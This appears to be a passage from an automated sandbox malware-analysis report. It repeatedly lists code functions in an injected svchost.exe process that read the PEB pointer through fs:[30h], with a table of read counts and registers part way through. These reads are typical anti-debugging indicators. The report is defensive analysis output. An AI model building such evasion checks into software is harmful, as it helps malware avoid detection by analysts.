            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h]1_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h]1_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h]1_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h]1_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2826B mov eax, dword ptr fs:[00000030h]1_2_02F2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A250 mov eax, dword ptr fs:[00000030h]1_2_02F2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36259 mov eax, dword ptr fs:[00000030h]1_2_02F36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEA250 mov eax, dword ptr fs:[00000030h]1_2_02FEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEA250 mov eax, dword ptr fs:[00000030h]1_2_02FEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB8243 mov eax, dword ptr fs:[00000030h]1_2_02FB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB8243 mov ecx, dword ptr fs:[00000030h]1_2_02FB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2823B mov eax, dword ptr fs:[00000030h]1_2_02F2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]1_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]1_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]1_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F663FF mov eax, dword ptr fs:[00000030h]1_2_02F663FF
            Source: C:\Windows\SysWOW64\svchost.exe (process 1): reads of the PEB pointer via "mov <reg>, dword ptr fs:[00000030h]", one row per code function. Reads = number of such instructions listed for that function in this part of the report; Regs = registers the PEB pointer is loaded into.

            Code function   Reads  Regs
            1_2_02F403E9    8      eax
            1_2_02FDE3DB    4      eax, ecx
            1_2_02FD43D4    2      eax
            1_2_02FEC3CD    1      eax
            1_2_02F3A3C0    6      eax
            1_2_02F383C0    4      eax
            1_2_02FB63C0    1      eax
            1_2_0300625D    1      eax
            1_2_02F28397    3      eax
            1_2_02F2E388    3      eax
            1_2_02F5438F    2      eax
            1_2_02FD437C    1      eax
            1_2_02FB035C    6      eax, ecx
            1_2_02FFA352    1      eax
            1_2_02FD8350    1      ecx
            1_2_02FB2349    15     eax
            1_2_030062D6    1      eax
            1_2_02F2C310    1      ecx
            1_2_02F50310    1      ecx
            1_2_02F6A30B    3      eax
            1_2_02F2C0F0    1      eax
            1_2_02F720F0    1      ecx
            1_2_02F2A0E3    1      ecx
            1_2_02F380E9    1      eax
            1_2_02FB60E0    1      eax
            1_2_02FB20DE    1      eax
            1_2_02FF60B8    2      eax, ecx
            1_2_02F280A0    1      eax
            1_2_02FC80A8    1      eax
            1_2_03004164    2      eax
            1_2_02F3208A    1      eax
            1_2_02F5C073    1      eax
            1_2_02F32050    1      eax
            1_2_02FB6050    1      eax
            1_2_02FC6030    1      eax
            1_2_02F2A020    1      eax
            1_2_02F2C020    1      eax
            1_2_02F4E016    4      eax
            1_2_030061E5    1      eax
            1_2_02FB4000    1      ecx
            1_2_02FD2000    8      eax
            1_2_02F601F8    1      eax
            1_2_02FAE1D0    5      eax, ecx
            1_2_02FF61C3    2      eax
            1_2_02FB019F    4      eax
            1_2_02F2A197    3      eax
            1_2_02F70185    1      eax
            1_2_02FEC188    2      eax
            1_2_02FD4180    2      eax
            1_2_02F2C156    1      eax
            1_2_02FC8158    1      eax
            1_2_02F36154    2      eax
            1_2_02FC4144    5      eax, ecx
            1_2_02F60124    1      eax
            1_2_02FDA118    4      eax, ecx
            1_2_02FF0115    1      eax
            1_2_02FDE10E    10     eax, ecx
            1_2_02FAE6F2    4      eax
            1_2_02FB06F1    2      eax
            1_2_02F6A6C7    2      eax, ebx
            1_2_02F666B0    1      eax
            1_2_02F6C6A6    1      eax
            1_2_02F34690    2      eax
            1_2_02F62674    1      eax
            1_2_02FF866E    2      eax
            1_2_02F6A660    2      eax
            1_2_02F4C640    1      eax
            1_2_02F4E627    1      eax
            1_2_02F66620    1      eax
            1_2_02F68620    1      eax
            1_2_02F3262C    1      eax
            1_2_02F72619    1      eax
            1_2_02FAE609    1      eax
            1_2_02F4260B    7      eax
            1_2_02F347FB    2      eax
            1_2_02F527ED    3      eax
            1_2_02FBE7E1    1      eax
            1_2_02F3C7C0    1      eax
            1_2_02FB07C3    1      eax
            1_2_02F307AF    1      eax
            1_2_02FE47A0    1      eax
            1_2_02FD678E    1      eax
            1_2_02F38770    1      eax
            1_2_02F40770    12     eax
            1_2_02F30750    1      eax
            1_2_02FBE75D    1      eax
            1_2_02F72750    2      eax
            1_2_02FB4755    1      eax
            1_2_02F6674D    3      eax, esi
            1_2_02F6273C    3      eax, ecx
            1_2_02FAC730    1      eax
            1_2_02F6C720    2      eax
            1_2_02F30710    1      eax
            1_2_02F60710    1      eax
            1_2_02F6C700    1      eax
            1_2_03004500    7      eax
            1_2_02F304E5    1      ecx
            1_2_02F644B0    1      ecx
            1_2_02FBA4B0    1      eax
            1_2_02F364AB    1      eax
            1_2_02FEA49A    1      eax
            1_2_02F5A470    3      eax
            1_2_02FBC460    1      ecx
            1_2_02FEA456    1      eax
            1_2_02F2645D    1      eax
            1_2_02F5245A    1      eax
            1_2_02F6E443    8      eax
            1_2_02F2E420    3      eax
            1_2_02F2C427    1      eax
            1_2_02FB6420    7      eax
            1_2_02F68402    3      eax
            1_2_02F5E5E7    8      eax
            1_2_02F325E0    1      eax
            1_2_02F6C5ED    2      eax
            1_2_02F365D0    1      eax
            1_2_02F6A5D0    2      eax
            1_2_02F6E5CF    2      eax
            1_2_02F545B1    2      eax
            1_2_02FB05A7    3      eax
            1_2_02F6E59C    1      eax
            1_2_02F32582    2      eax, ecx
            1_2_02F64588    1      eax
            1_2_02F6656A    3      eax
            1_2_02F38550    2      eax
            1_2_02F40535    2      eax
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6500 mov eax, dword ptr fs:[00000030h]1_2_02FC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004B00 mov eax, dword ptr fs:[00000030h]1_2_03004B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6AAEE mov eax, dword ptr fs:[00000030h]1_2_02F6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6AAEE mov eax, dword ptr fs:[00000030h]1_2_02F6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30AD0 mov eax, dword ptr fs:[00000030h]1_2_02F30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F64AD0 mov eax, dword ptr fs:[00000030h]1_2_02F64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F64AD0 mov eax, dword ptr fs:[00000030h]1_2_02F64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h]1_2_02F86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h]1_2_02F86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h]1_2_02F86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38AA0 mov eax, dword ptr fs:[00000030h]1_2_02F38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38AA0 mov eax, dword ptr fs:[00000030h]1_2_02F38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03002B57 mov eax, dword ptr fs:[00000030h]1_2_03002B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03002B57 mov eax, dword ptr fs:[00000030h]1_2_03002B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03002B57 mov eax, dword ptr fs:[00000030h]1_2_03002B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03002B57 mov eax, dword ptr fs:[00000030h]1_2_03002B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86AA4 mov eax, dword ptr fs:[00000030h]1_2_02F86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68A90 mov edx, dword ptr fs:[00000030h]1_2_02F68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FACA72 mov eax, dword ptr fs:[00000030h]1_2_02FACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FACA72 mov eax, dword ptr fs:[00000030h]1_2_02FACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h]1_2_02F6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h]1_2_02F6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h]1_2_02F6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEA60 mov eax, dword ptr fs:[00000030h]1_2_02FDEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40A5B mov eax, dword ptr fs:[00000030h]1_2_02F40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40A5B mov eax, dword ptr fs:[00000030h]1_2_02F40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F54A35 mov eax, dword ptr fs:[00000030h]1_2_02F54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F54A35 mov eax, dword ptr fs:[00000030h]1_2_02F54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA24 mov eax, dword ptr fs:[00000030h]1_2_02F6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EA2E mov eax, dword ptr fs:[00000030h]1_2_02F5EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBCA11 mov eax, dword ptr fs:[00000030h]1_2_02FBCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h]1_2_02F38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h]1_2_02F38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h]1_2_02F38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EBFC mov eax, dword ptr fs:[00000030h]1_2_02F5EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBCBF0 mov eax, dword ptr fs:[00000030h]1_2_02FBCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEBD0 mov eax, dword ptr fs:[00000030h]1_2_02FDEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h]1_2_02F50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h]1_2_02F50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h]1_2_02F50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h]1_2_02F30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h]1_2_02F30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h]1_2_02F30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40BBE mov eax, dword ptr fs:[00000030h]1_2_02F40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40BBE mov eax, dword ptr fs:[00000030h]1_2_02F40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]1_2_02FE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]1_2_02FE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004A80 mov eax, dword ptr fs:[00000030h]1_2_03004A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2CB7E mov eax, dword ptr fs:[00000030h]1_2_02F2CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28B50 mov eax, dword ptr fs:[00000030h]1_2_02F28B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEB50 mov eax, dword ptr fs:[00000030h]1_2_02FDEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE4B4B mov eax, dword ptr fs:[00000030h]1_2_02FE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE4B4B mov eax, dword ptr fs:[00000030h]1_2_02FE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6B40 mov eax, dword ptr fs:[00000030h]1_2_02FC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6B40 mov eax, dword ptr fs:[00000030h]1_2_02FC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFAB40 mov eax, dword ptr fs:[00000030h]1_2_02FFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8B42 mov eax, dword ptr fs:[00000030h]1_2_02FD8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EB20 mov eax, dword ptr fs:[00000030h]1_2_02F5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EB20 mov eax, dword ptr fs:[00000030h]1_2_02F5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF8B28 mov eax, dword ptr fs:[00000030h]1_2_02FF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF8B28 mov eax, dword ptr fs:[00000030h]1_2_02FF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]1_2_02F6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]1_2_02F6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA8E4 mov eax, dword ptr fs:[00000030h]1_2_02FFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E8C0 mov eax, dword ptr fs:[00000030h]1_2_02F5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004940 mov eax, dword ptr fs:[00000030h]1_2_03004940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC89D mov eax, dword ptr fs:[00000030h]1_2_02FBC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30887 mov eax, dword ptr fs:[00000030h]1_2_02F30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE872 mov eax, dword ptr fs:[00000030h]1_2_02FBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE872 mov eax, dword ptr fs:[00000030h]1_2_02FBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6870 mov eax, dword ptr fs:[00000030h]1_2_02FC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6870 mov eax, dword ptr fs:[00000030h]1_2_02FC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60854 mov eax, dword ptr fs:[00000030h]1_2_02F60854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34859 mov eax, dword ptr fs:[00000030h]1_2_02F34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34859 mov eax, dword ptr fs:[00000030h]1_2_02F34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F42840 mov ecx, dword ptr fs:[00000030h]1_2_02F42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov ecx, dword ptr fs:[00000030h]1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A830 mov eax, dword ptr fs:[00000030h]1_2_02F6A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD483A mov eax, dword ptr fs:[00000030h]1_2_02FD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD483A mov eax, dword ptr fs:[00000030h]1_2_02FD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC810 mov eax, dword ptr fs:[00000030h]1_2_02FBC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F629F9 mov eax, dword ptr fs:[00000030h]1_2_02F629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F629F9 mov eax, dword ptr fs:[00000030h]1_2_02F629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE9E0 mov eax, dword ptr fs:[00000030h]1_2_02FBE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F649D0 mov eax, dword ptr fs:[00000030h]1_2_02F649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA9D3 mov eax, dword ptr fs:[00000030h]1_2_02FFA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC69C0 mov eax, dword ptr fs:[00000030h]1_2_02FC69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB89B3 mov esi, dword ptr fs:[00000030h]1_2_02FB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB89B3 mov eax, dword ptr fs:[00000030h]1_2_02FB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB89B3 mov eax, dword ptr fs:[00000030h]1_2_02FB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F309AD mov eax, dword ptr fs:[00000030h]1_2_02F309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F309AD mov eax, dword ptr fs:[00000030h]1_2_02F309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4978 mov eax, dword ptr fs:[00000030h]1_2_02FD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4978 mov eax, dword ptr fs:[00000030h]1_2_02FD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC97C mov eax, dword ptr fs:[00000030h]1_2_02FBC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F56962 mov eax, dword ptr fs:[00000030h]1_2_02F56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F56962 mov eax, dword ptr fs:[00000030h]1_2_02F56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F56962 mov eax, dword ptr fs:[00000030h]1_2_02F56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7096E mov eax, dword ptr fs:[00000030h]1_2_02F7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7096E mov edx, dword ptr fs:[00000030h]1_2_02F7096E
